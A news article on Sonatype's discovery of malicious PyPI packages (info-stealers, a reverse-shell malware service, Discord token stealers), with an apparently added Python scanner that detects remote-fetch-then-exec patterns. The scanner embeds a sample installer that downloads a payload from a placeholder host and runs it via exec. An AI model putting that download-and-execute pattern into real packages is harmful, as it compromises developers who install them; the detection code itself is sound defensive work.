Researchers Uncover 7000 Malicious Open Source Packages

Security vendor Sonatype detected 6933 malicious open source packages in the month of March alone, bringing the total discovered since 2019 to 115,165.

Info-stealers comprised a significant number of these malicious components, including copycats of the popular W4SP stealer, such as one called “microsoft-helper” from an author self-described as “idklmao.”

“The name of the package, microsoft-helper, might be the bad actors’ attempt to disguise its malicious nature, maybe with the goal of potentially adding it as a dependency of a popular package they’ve already owned,” Sonatype explained.

“However, the author’s name, composed by abbreviations, didn’t even try to pretend it was from a legit author.”

The malicious package featured a second-stage payload, which Sonatype said gives the threat actors more flexibility because they can modify the code more easily without needing to start everything from scratch.

Unlike “microsoft-helper,” the authors of the “reverse-shell” package Sonatype found last month made no attempt to hide their intent.

It denoted a malware-as-a-service (MaaS) offering for the Spanish market, hosting malicious files on GitHub.

“Even though the package ‘reverse-shell’ doesn’t look malicious at first glance, the file that it executes from GitHub, ‘bypass.py,’ and consequently, ‘WindowsDefender.py,’ are nothing but nefarious,” the security vendor explained.

“Hosting malicious files on a public repository provides bad actors more control over them. It gives them the power of deleting, upgrading, or even doing version control of the payload.”

Finally, Sonatype highlighted two heavily obfuscated packages, “proxier-api” and “nitro-api66,” designed to steal Discord tokens.

All of the above were discovered on the Python Package Index (PyPI) repository.
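The staging pattern described above, where an installed package fetches its real payload from a remote host and runs it, leaves a recognizable shape in source code. As an added example (not Sonatype's tooling and not code from the packages named here), this Python sketch flags `exec`/`eval` calls fed by downloaded data; the fetcher list, function names and sample input are assumptions constructed for illustration.

```python
import ast
# Heuristic lists (assumptions); a production scanner would cover more calls.
FETCHERS = {"urlopen", "urllib.request.urlopen", "requests.get", "httpx.get"}
SINKS = {"exec", "eval"}

# Constructed sample of an installer that stages its payload remotely.
SAMPLE = '''
from urllib.request import urlopen
import base64
STAGE2 = "https://example.invalid/placeholder/stage2.py"
body = urlopen(STAGE2).read()
exec(base64.b64decode(body))
'''

def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or the trailing attrs only."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))

class RemoteExecFinder(ast.NodeVisitor):
    def __init__(self):
        self.tainted, self.findings = set(), []

    def _remote(self, node):
        # True if the expression contains a fetch call or a tainted variable.
        return any(
            (isinstance(s, ast.Call) and dotted(s.func) in FETCHERS)
            or (isinstance(s, ast.Name) and s.id in self.tainted)
            for s in ast.walk(node))

    def visit_Assign(self, node):
        if self._remote(node.value):  # propagate taint through assignments
            self.tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
        self.generic_visit(node)

    def visit_Call(self, node):
        if dotted(node.func) in SINKS and any(self._remote(a) for a in node.args):
            self.findings.append((node.lineno, dotted(node.func)))
        self.generic_visit(node)

def find_remote_exec(source):
    finder = RemoteExecFinder()
    finder.visit(ast.parse(source))
    return finder.findings
```

Because it parses rather than runs the file, the check is safe to apply to an unpacked sdist or wheel before installation; heavily obfuscated code will evade a syntactic check like this and needs deeper analysis.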

“These types of packages are a cause for concern as they pose a serious threat to developers who may inadvertently download and install them,” the vendor argued. “Given the potential danger involved, we reported them to the PyPI team and they took them down promptly and proficiently.”
